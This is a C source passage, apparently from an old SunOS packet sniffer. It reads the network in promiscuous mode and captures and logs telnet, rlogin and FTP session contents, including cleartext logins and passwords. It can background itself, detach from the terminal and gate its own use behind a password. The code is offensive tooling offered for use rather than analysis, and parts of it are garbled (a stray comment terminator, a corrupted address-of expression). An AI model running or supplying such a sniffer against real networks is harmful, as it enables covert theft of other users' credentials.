#define PR_DATA(dp,ln) { \
|
|
register u_char lastc=0; \
|
|
while(ln-- >0) { \
|
|
if(*dp < 32) { \
|
|
switch(*dp) { \
|
|
case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
|
|
break; \
|
|
case '\r': \
|
|
case '\n': fprintf(LOG,"\n : "); \
|
|
break; \
|
|
default : fprintf(LOG,"^%c", (*dp + 64)); \
|
|
break; \
|
|
} \
|
|
} else { \
|
|
if(isprint(*dp)) fputc(*dp,LOG); \
|
|
else fprintf(LOG,"(%d)",*dp); \
|
|
} \
|
|
lastc = *dp++; \
|
|
} \
|
|
fflush(LOG); \
|
|
}
|
|
|
|
void END_NODE(CLe,d,dl,msg)
|
|
register struct CREC *CLe;
|
|
register u_char *d;
|
|
register int dl;
|
|
register char *msg;
|
|
{
|
|
fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
|
|
fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
|
|
fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
|
|
fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
|
|
NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
|
|
fprintf(LOG," DATA: ");
|
|
{ register u_int i = CLe->Length;
|
|
register u_char *p = CLe->Data;
|
|
PR_DATA(p,i);
|
|
PR_DATA(d,dl);
|
|
}
|
|
|
|
fprintf(LOG,"\n-- \n");
|
|
fflush(LOG);
|
|
|
|
if(CLe->Next != NULL)
|
|
CLe->Next->Last = CLe->Last;
|
|
if(CLe->Last != NULL)
|
|
CLe->Last->Next = CLe->Next;
|
|
else
|
|
CLroot = CLe->Next;
|
|
free(CLe);
|
|
}
|
|
|
|
/* 30 mins (x 60 seconds) */
|
|
#define IDLE_TIMEOUT 1800
|
|
#define IDLE_NODE() { \
|
|
time_t tm; \
|
|
time(&tm); \
|
|
if(LastTIME<tm) { \
|
|
register struct CREC *CLe,*CLt = CLroot; \
|
|
LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
|
|
while(CLe=CLt) { \
|
|
CLt=CLe->Next; \
|
|
if(CLe->Time <tm) \
|
|
END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
|
|
} \
|
|
} \
|
|
}
|
|
|
|
void filter(cp, pktlen)
|
|
register char *cp;
|
|
register u_int pktlen;
|
|
{
|
|
register struct ip *ip;
|
|
register struct tcphdr *tcph;
|
|
|
|
{ register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);
|
|
|
|
if(EtherType < 0x600) {
|
|
EtherType = *(u_short *)(cp + SZETH + 6);
|
|
cp+=8; pktlen-=8;
|
|
}
|
|
|
|
if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
|
|
return;
|
|
}
|
|
|
|
/* ugh, gotta do an alignment :-( */
|
|
bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));
|
|
|
|
ip = (struct ip *)Packet;
|
|
if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
|
|
return;
|
|
tcph = (struct tcphdr *)(Packet + IPHLEN);
|
|
|
|
if(!( (TCPD == IPPORT_TELNET) ||
|
|
(TCPD == IPPORT_LOGINSERVER) ||
|
|
(TCPD == IPPORT_FTP)
|
|
)) return;
|
|
|
|
{ register struct CREC *CLm;
|
|
register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
|
|
register u_char *p = (u_char *)Packet;
|
|
|
|
p += ((IPHLEN * 4) + (TCPOFF * 4));
|
|
|
|
if(debug) {
|
|
fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
|
|
fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
|
|
fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
|
|
}
|
|
|
|
if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {
|
|
|
|
CLm->PKcnt++;
|
|
|
|
if(length>0)
|
|
if( (CLm->Length + length) < MAXBUFLEN ) {
|
|
ADDDATA_NODE( CLm, p,length);
|
|
} else {
|
|
END_NODE( CLm, p,length, "DATA LIMIT");
|
|
}
|
|
|
|
if(TCPFL(TH_FIN|TH_RST)) {
|
|
END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
|
|
}
|
|
|
|
} else {
|
|
|
|
if(TCPFL(TH_SYN)) {
|
|
ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
|
|
}
|
|
|
|
}
|
|
|
|
IDLE_NODE();
|
|
|
|
}
|
|
|
|
}
|
|
|
|
/* signal handler
|
|
*/
|
|
void death()
|
|
{ register struct CREC *CLe;
|
|
|
|
while(CLe=CLroot)
|
|
END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");
|
|
|
|
fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
|
|
fflush(LOG);
|
|
if(LOG != stdout)
|
|
fclose(LOG);
|
|
exit(1);
|
|
}
|
|
|
|
/* opens network interface, performs ioctls and reads from it,
|
|
* passing data to filter function
|
|
*/
|
|
void do_it()
|
|
{
|
|
int cc;
|
|
char *buf;
|
|
u_short sp_ts_len;
|
|
|
|
if(!(buf=malloc(CHUNKSIZE)))
|
|
Pexit(1,"Eth: malloc");
|
|
|
|
/* this /dev/nit initialization code pinched from etherfind */
|
|
{
|
|
struct strioctl si;
|
|
struct ifreq ifr;
|
|
struct timeval timeout;
|
|
u_int chunksize = CHUNKSIZE;
|
|
u_long if_flags = NI_PROMISC;
|
|
|
|
if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
|
|
Pexit(1,"Eth: nit open");
|
|
|
|
if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
|
|
Pexit(1,"Eth: ioctl (I_SRDOPT)");
|
|
|
|
si.ic_timout = INFTIM;
|
|
|
|
if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
|
|
Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");
|
|
|
|
timeout.tv_sec = 1;
|
|
timeout.tv_usec = 0;
|
|
si.ic_cmd = NIOCSTIME;
|
|
si.ic_len = sizeof(timeout);
|
|
si.ic_dp = (char *)&timeout;
|
|
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
|
|
Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");
|
|
|
|
si.ic_cmd = NIOCSCHUNK;
|
|
si.ic_len = sizeof(chunksize);
|
|
si.ic_dp = (char *)&chunksize;
|
|
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
|
|
Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");
|
|
|
|
strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
|
|
ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
|
|
si.ic_cmd = NIOCBIND;
|
|
si.ic_len = sizeof(ifr);
|
|
si.ic_dp = (char *)𝔦
|
|
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
|
|
Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");
|
|
|
|
si.ic_cmd = NIOCSFLAGS;
|
|
si.ic_len = sizeof(if_flags);
|
|
si.ic_dp = (char *)&if_flags;
|
|
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
|
|
Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");
|
|
|
|
if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
|
|
Pexit(1,"Eth: ioctl (I_FLUSH)");
|
|
}
|
|
|
|
while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
|
|
register char *bp = buf,
|
|
*bufstop = (buf + cc);
|
|
|
|
while (bp < bufstop) {
|
|
register char *cp = bp;
|
|
register struct nit_bufhdr *hdrp;
|
|
|
|
hdrp = (struct nit_bufhdr *)cp;
|
|
cp += sizeof(struct nit_bufhdr);
|
|
bp += hdrp->nhb_totlen;
|
|
filter(cp, (u_long)hdrp->nhb_msglen);
|
|
}
|
|
}
|
|
Pexit((-1),"Eth: read");
|
|
}
|
|
/* Authorize your proogie,generate your own password and uncomment here */
|
|
/* #define AUTHPASSWD "EloiZgZejWyms" */
|
|
|
|
void getauth()
|
|
{ char *buf,*getpass(),*crypt();
|
|
char pwd[21],prmpt[81];
|
|
|
|
strcpy(pwd,AUTHPASSWD);
|
|
sprintf(prmpt,"(%s)UP? ",ProgName);
|
|
buf=getpass(prmpt);
|
|
if(strcmp(pwd,crypt(buf,pwd)))
|
|
exit(1);
|
|
}
|
|
*/
|
|
void main(argc, argv)
|
|
int argc;
|
|
char **argv;
|
|
{
|
|
char cbuf[BUFSIZ];
|
|
struct ifconf ifc;
|
|
int s,
|
|
ac=1,
|
|
backg=0;
|
|
|
|
ProgName=argv[0];
|
|
|
|
/* getauth(); */
|
|
|
|
LOG=NULL;
|
|
device=NULL;
|
|
while((ac<argc) && (argv[ac][0] == '-')) {
|
|
register char ch = argv[ac++][1];
|
|
switch(toupper(ch)) {
|
|
case 'I': device=argv[ac++];
|
|
break;
|
|
case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
|
|
Zexit(1,"Output file cant be opened\n");
|
|
break;
|
|
case 'B': backg=1;
|
|
break;
|
|
case 'D': debug=1;
|
|
break;
|
|
default : fprintf(ERR,
|
|
"Usage: %s [-b] [-d] [-i interface] [-f file]\n",
|
|
ProgName);
|
|
exit(1);
|
|
}
|
|
}
|
|
|
|
if(!device) {
|
|
if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
|
|
Pexit(1,"Eth: socket");
|
|
|
|
ifc.ifc_len = sizeof(cbuf);
|
|
ifc.ifc_buf = cbuf;
|
|
if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
|
|
Pexit(1,"Eth: ioctl");
|
|
|
|
close(s);
|
|
device = ifc.ifc_req->ifr_name;
|
|
}
|
|
|
|
fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
|
|
fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
|
|
(debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");
|
|
|
|
if(!LOG)
|
|
LOG=stdout;
|
|
|
|
signal(SIGINT, death);
|
|
signal(SIGTERM,death);
|
|
signal(SIGKILL,death);
|
|
signal(SIGQUIT,death);
|
|
|
|
if(backg && debug) {
|
|
fprintf(ERR,"[Cannot bg with debug on]\n");
|
|
backg=0;
|
|
}
|
|
|
|
if(backg) {
|
|
register int s;
|
|
|
|
if((s=fork())>0) {
|
|
fprintf(ERR,"[pid %d]\n",s);
|
|
exit(0);
|
|
} else if(s<0)
|
|
Pexit(1,"fork");
|
|
|
|
if( (s=open("/dev/tty",O_RDWR))>0 ) {
|
|
ioctl(s,TIOCNOTTY,(char *)NULL);
|
|
close(s);
|
|
}
|
|
}
|
|
fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
|
|
fflush(LOG);
|
|
|
|
do_it();
|
|
}
|
|
|